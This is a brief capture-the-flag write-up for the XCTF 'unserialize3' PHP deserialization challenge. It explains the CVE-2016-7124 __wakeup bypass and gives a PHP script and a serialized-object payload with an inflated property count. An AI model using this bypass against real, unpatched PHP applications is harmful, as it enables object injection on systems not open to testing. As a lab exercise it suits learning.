XCTF-meinialize3

unserialize3

This question is still php deserialization

Came in and saw a few lines of code given

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

Explain that there is an xctf class, and then there is a magic function __wakeup(it will be triggered when deserialization)

I just did a question this morning, using the CVE-2016-7124loophole, when the value of the number of object attributes in the serialized string is greater than the actual number of attributes, it will skip __wakeupthe execution

php script

<?php 
class xctf{
	public $flag = '111';
	public function __construct($flag) { 
        $this->flag = $flag; 
    }
	public function __wakeup(){
	exit('bad requests');
	}
}
$a = new xctf('xxx');
$b = serialize($a);
echo $b;
echo '<br>';
$c= str_replace(':1:', ':2:', $b);
echo $c;

?>

payload：O:4:"xctf":2:{s:4:"flag";s:3:"xxx";}